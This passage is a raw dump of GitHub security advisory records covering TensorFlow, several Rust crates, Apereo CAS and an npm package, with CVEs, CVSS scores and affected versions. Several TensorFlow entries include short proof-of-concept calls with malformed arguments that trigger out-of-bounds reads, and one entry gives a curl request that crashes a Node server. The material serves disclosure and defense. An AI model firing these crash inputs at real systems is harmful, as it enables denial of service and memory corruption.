{'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0041.html'}]","{'cwe_ids': ['CWE-129'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:20:35Z', 'nvd_published_at': None}" +1.4.0,GHSA-q3g3-h9r4-prrc,2021-08-24T13:19:13Z,2021-08-25T14:42:47Z,,['CVE-2021-37659'],Reference binding to nullptr and heap OOB in binary cwise ops,"### Impact +An attacker can cause undefined behavior via binding a reference to null pointer in all binary cwise operations that don't require broadcasting (e.g., gradients of binary cwise operations): + +```python +import tensorflow as tf + +tf.raw_ops.SqrtGrad(y=[4, 16],dy=[]) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/cwise_ops_common.h#L264) assumes that the two inputs have exactly the same number of elements but does not check that. Hence, when the eigen functor executes it triggers heap OOB reads and undefined behavior due to binding to nullptr. + +### Patches +We have patched the issue in GitHub commit [93f428fd1768df147171ed674fee1fc5ab8309ec](https://github.com/tensorflow/tensorflow/commit/93f428fd1768df147171ed674fee1fc5ab8309ec). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-q3g3-h9r4-prrc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37659'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/93f428fd1768df147171ed674fee1fc5ab8309ec'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T13:19:13Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-v82p-hv3v-p6qp,2021-08-24T13:55:57Z,2021-08-25T14:42:16Z,,['CVE-2021-37665'],Incomplete validation in MKL requantization,"### Impact +Due to incomplete validation in MKL implementation of requantization, an attacker can trigger undefined behavior via binding a reference to a null pointer or can access data outside the bounds of heap allocated arrays: + +```python +import tensorflow as tf + +tf.raw_ops.RequantizationRangePerChannel( + input=[], + input_min=[0,0,0,0,0], + input_max=[1,1,1,1,1], + clip_value_max=1) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/mkl/mkl_requantization_range_per_channel_op.cc) does not validate the dimensions of the `input` tensor. + +A similar issue occurs in `MklRequantizePerChannelOp`: + +```python +import tensorflow as tf +from tensorflow.python.ops import gen_math_ops + +gen_math_ops.requantize_per_channel( + input=[], + input_min=[-100,-100,-100,-100,-100], + input_max=[-100,-100,-100], + requested_output_min=[-100,-100,-100,-100,-100], + requested_output_max=[], + out_type=tf.int) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/mkl/mkl_requantize_per_channel_op.cc) does not perform full validation for all the input arguments. + +### Patches +We have patched the issue in GitHub commit [9e62869465573cb2d9b5053f1fa02a81fce21d69](https://github.com/tensorflow/tensorflow/commit/9e62869465573cb2d9b5053f1fa02a81fce21d69) and in the Github commit [203214568f5bc237603dbab6e1fd389f1572f5c9](https://github.com/tensorflow/tensorflow/commit/203214568f5bc237603dbab6e1fd389f1572f5c9). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-v82p-hv3v-p6qp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37665'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/203214568f5bc237603dbab6e1fd389f1572f5c9'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/9e62869465573cb2d9b5053f1fa02a81fce21d69'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T13:55:57Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-hxw9-jxqw-jc8j,2021-08-24T18:21:21Z,2021-08-25T20:58:05Z,,['CVE-2020-36459'],Data races in dces,"An issue was discovered in the dces crate through 2020-12-09 for Rust. The World type is marked as Send but lacks bounds on its EntityStore and ComponentStore. This allows non-thread safe `EntityStore` and `ComponentStore`s to be sent +across threads and cause data races. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'dces'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36459'}, {'type': 'PACKAGE', 'url': 'https://gitlab.redox-os.org/redox-os/dces-rust'}, {'type': 'WEB', 'url': 'https://gitlab.redox-os.org/redox-os/dces-rust/-/issues/8'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/dces/RUSTSEC-2020-0139.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0139.html'}]","{'cwe_ids': ['CWE-362', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:20:09Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-rqgx-hpg4-456r,2021-08-19T20:50:52Z,2021-08-25T20:49:45Z,,['CVE-2020-35902'],Use-after-free in actix-codec,An issue was discovered in the actix-codec crate before 0.3.0-beta.1 for Rust. There is a use-after-free in Framed.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'actix-codec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35902'}, {'type': 'WEB', 'url': 'https://github.com/actix/actix-net/issues/91'}, {'type': 'PACKAGE', 'url': 'https://github.com/actix/actix-net'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0049.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:50:52Z', 'nvd_published_at': '2020-12-31T09:15:00Z'}" +1.4.0,GHSA-hrjm-c879-pp86,2023-08-25T00:12:24Z,2021-08-25T20:46:46Z,,['CVE-2019-25003'],libsecp256k1 contains side-channel timing attack,Versions of libsecp256k1 prior to 0.3.1 did not execute `Scalar::check_overflow` in constant time. This allows an attacker to potentially leak information via a timing attack. The flaw was corrected by modifying `Scalar::check_overflow` to execute in constant time.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'libsecp256k1'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25003'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/libsecp256k1/commit/11ba23a9766a5079918cd9f515bc100bc8164b50'}, {'type': 'PACKAGE', 'url': 'https://github.com/paritytech/libsecp256k1'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0027.html'}]","{'cwe_ids': ['CWE-208'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:19:40Z', 'nvd_published_at': None}" +1.4.0,GHSA-8q2v-67v7-6vc6,2023-06-13T20:48:27Z,2021-08-25T20:48:07Z,,['CVE-2020-35882'],Data races in rocket,The affected version of rocket contains a Clone trait implementation of LocalRequest that reuses the pointer to inner Request object. This causes data race in rare combinations of APIs if the original and the cloned objects are modified at the same time.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rocket'}, 'ecosystem_specific': {'affected_functions': ['rocket::local::LocalRequest::clone']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '0.4.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35882'}, {'type': 'WEB', 'url': 'https://github.com/SergioBenitez/Rocket/issues/1312'}, {'type': 'PACKAGE', 'url': 'https://github.com/SergioBenitez/Rocket'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0028.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:07:49Z', 'nvd_published_at': None}" +1.4.0,GHSA-jqfh-8hw5-fqjr,2021-10-21T14:15:03Z,2021-08-25T14:44:48Z,,['CVE-2021-39157'],Improper Handling of Exceptional Conditions in detect-character-encoding,"### Impact + +In detect-character-encoding v0.6.0 and earlier, data matching no charset causes the Node.js process to crash. + +### Patches + +The problem has been patched in [detect-character-encoding v0.7.0](https://github.com/sonicdoe/detect-character-encoding/releases/tag/v0.7.0). + +### CVSS score + +[CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/RL:O/RC:C](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/RL:O/RC:C) + +Base Score: 7.5 (High) +Temporal Score: 7.2 (High) + +Since detect-character-encoding is a library, the scoring is based on the “[reasonable worst-case implementation scenario](https://www.first.org/cvss/v3.1/user-guide#3-7-Scoring-Vulnerabilities-in-Software-Libraries-and-Similar)”, namely, accepting data from untrusted sources over a network and passing it directly to detect-character-encoding. Depending on your specific implementation, the vulnerability’s severity in your program may be different. + +### Proof of concept + +```js +const express = require(""express""); +const bodyParser = require(""body-parser""); +const detectCharacterEncoding = require(""detect-character-encoding""); + +const app = express(); + +app.use(bodyParser.raw()); + +app.post(""/"", (req, res) => { + const charsetMatch = detectCharacterEncoding(req.body); + + res.end(charsetMatch.encoding); +}); + +app.listen(3000); +``` + +`printf ""\xAA"" | curl --request POST --header ""Content-Type: application/octet-stream"" --data-binary @- http://localhost:3000` crashes the server.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'detect-character-encoding'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sonicdoe/detect-character-encoding/security/advisories/GHSA-jqfh-8hw5-fqjr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39157'}, {'type': 'WEB', 'url': 'https://github.com/sonicdoe/detect-character-encoding/issues/15'}, {'type': 'WEB', 'url': 'https://github.com/sonicdoe/detect-character-encoding/commit/992a11007fff6cfd40b952150ab8d30410c4a20a'}, {'type': 'PACKAGE', 'url': 'https://github.com/sonicdoe/detect-character-encoding'}, {'type': 'WEB', 'url': 'https://github.com/sonicdoe/detect-character-encoding/releases/tag/v0.7.0'}]","{'cwe_ids': ['CWE-755'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T19:11:52Z', 'nvd_published_at': '2021-08-24T19:15:00Z'}" +1.4.0,GHSA-62jx-8vmh-4mcw,2023-06-13T22:04:07Z,2021-08-25T20:58:23Z,,['CVE-2021-38511'],Links in archive can create arbitrary directories,"When unpacking a tarball that contains a symlink the tar crate may create directories outside of the directory it's supposed to unpack into. The function errors when it's trying to create a file, but the folders are already created at this point.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'tar'}, 'ecosystem_specific': {'affected_functions': ['tar::Archive::unpack']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.36'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38511'}, {'type': 'WEB', 'url': 'https://github.com/alexcrichton/tar-rs/issues/238'}, {'type': 'WEB', 'url': 'https://github.com/alexcrichton/tar-rs/pull/259'}, {'type': 'PACKAGE', 'url': 'https://github.com/alexcrichton/tar-rs'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/tar/RUSTSEC-2021-0080.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0080.html'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:08:23Z', 'nvd_published_at': '2021-08-10T23:15:00Z'}" +1.4.0,GHSA-w7j2-35mf-95p7,2022-07-13T20:03:17Z,2021-08-25T20:52:16Z,,['CVE-2021-27378'],Incorrect check on buffer length in rand_core,"An issue was discovered in the rand_core crate before 0.6.2 for Rust. Because `read_u32_into` and `read_u64_into` mishandle certain buffer-length checks, a random number generator may be seeded with too little data. The vulnerability was introduced in v0.6.0. The advisory doesn't apply to earlier minor version numbers. + +Because read_u32_into and read_u64_into mishandle certain buffer-length checks, a random number generator may be seeded with too little data.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rand_core'}, 'ecosystem_specific': {'affected_functions': ['rand_core::le::read_u32_into', 'rand_core::le::read_u64_into']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.6.0'}, {'fixed': '0.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27378'}, {'type': 'WEB', 'url': 'https://github.com/rust-random/rand/pull/1096'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-random/rand'}, {'type': 'WEB', 'url': 'https://github.com/rust-random/rand/compare/0.6.0...rand_core-0.6.2#diff-f41b3dfa5ce28f3bee390d327c50621e141cf3569921f8e9ca15ccfcf25263a9R19'}, {'type': 'WEB', 'url': 'https://github.com/rust-random/rand/compare/0.6.0...rand_core-0.6.2#diff-f41b3dfa5ce28f3bee390d327c50621e141cf3569921f8e9ca15ccfcf25263a9R28'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0023.html'}]","{'cwe_ids': ['CWE-330'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:35:01Z', 'nvd_published_at': '2021-02-18T04:15:00Z'}" +1.4.0,GHSA-rpcm-whqc-jfw8,2021-08-19T21:22:31Z,2021-08-25T20:44:53Z,,['CVE-2019-15552'],Use after free in libflate,"An issue was discovered in the libflate crate before 0.1.25 for Rust. MultiDecoder::read has a use-after-free, leading to arbitrary code execution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'libflate'}, 'ecosystem_specific': {'affected_functions': ['libflate::gzip::MultiDecoder::read']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.1.14'}, {'fixed': '0.1.25'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15552'}, {'type': 'WEB', 'url': 'https://github.com/sile/libflate/issues/35'}, {'type': 'WEB', 'url': 'https://github.com/sile/libflate/pull/37'}, {'type': 'WEB', 'url': 'https://github.com/sile/libflate/commit/ffeff7c65deac5a6f886db2a59bcae4e420e4706'}, {'type': 'PACKAGE', 'url': 'https://github.com/sile/libflate'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0010.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:22:31Z', 'nvd_published_at': '2019-08-26T15:15:00Z'}" +1.4.0,GHSA-q39c-5vh5-vw2p,2021-07-26T18:43:04Z,2021-08-02T16:47:10Z,,['CVE-2020-27178'],Improper Authentication in Apereo CAS,"Apereo CAS 5.3.x before 5.3.16, 6.x before 6.1.7.2, 6.2.x before 6.2.4, and 6.3.x before 6.3.0-RC4 mishandles secret keys with Google Authenticator for multifactor authentication.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apereo.cas:cas-server-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.3.0'}, {'fixed': '5.3.16'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apereo.cas:cas-server-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.1.7.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.1.7.1'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apereo.cas:cas-server-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apereo.cas:cas-server-support-otp-mfa-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.3.0'}, {'fixed': '5.3.16'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apereo.cas:cas-server-support-otp-mfa-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.1.7.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.1.7.1'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apereo.cas:cas-server-support-otp-mfa-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27178'}, {'type': 'WEB', 'url': 'https://apereo.github.io/2020/10/14/gauthvuln/'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T18:43:04Z', 'nvd_published_at': '2020-10-16T16:15:00Z'}" +1.4.0,GHSA-5hj3-vjjf-f5m7,2021-08-24T14:35:33Z,2021-08-25T14:41:39Z,,['CVE-2021-37672'],Heap OOB in `SdcaOptimizerV2`,"### Impact +An attacker can read from outside of bounds of heap allocated data by sending specially crafted illegal arguments to `tf.raw_ops.SdcaOptimizerV2`: + +```python +import tensorflow as tf + +tf.raw_ops.SdcaOptimizerV2( + sparse_example_indices=[[1]], + sparse_feature_indices=[[1]], + sparse_feature_values=[[1.0,2.0]], + dense_features=[[1.0]], + example_weights=[1.0], + example_labels=[], + sparse_indices=[1], + sparse_weights=[1.0], + dense_weights=[[1.0]], + example_state_data=[[100.0,100.0,100.0,100.0]], + loss_type='logistic_loss', + l1=100.0, + l2=100.0, + num_loss_partitions=1, + num_inner_iterations=1, + adaptive=True) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/sdca_internal.cc#L320-L353) does not check that the length of `example_labels` is the same as the number of examples. + +### Patches +We have patched the issue in GitHub commit [a4e138660270e7599793fa438cd7b2fc2ce215a6](https://github.com/tensorflow/tensorflow/commit/a4e138660270e7599793fa438cd7b2fc2ce215a6). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-5hj3-vjjf-f5m7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37672'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a4e138660270e7599793fa438cd7b2fc2ce215a6'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T14:35:33Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-4xfp-4pfp-89wg,2021-08-24T13:07:20Z,2021-08-25T14:42:55Z,,['CVE-2021-37656'],Reference binding to nullptr in `RaggedTensorToSparse`,"### Impact +An attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.RaggedTensorToSparse`: + +```python +import tensorflow as tf + +tf.raw_ops.RaggedTensorToSparse( + rt_nested_splits=[[0, 38, 0]], + rt_dense_values=[]) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/ragged_tensor_to_sparse_kernel.cc#L30) has an incomplete validation of the splits values: it does not check that they are in increasing order. + +### Patches +We have patched the issue in GitHub commit [1071f554dbd09f7e101324d366eec5f4fe5a3ece](https://github.com/tensorflow/tensorflow/commit/1071f554dbd09f7e101324d366eec5f4fe5a3ece). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': 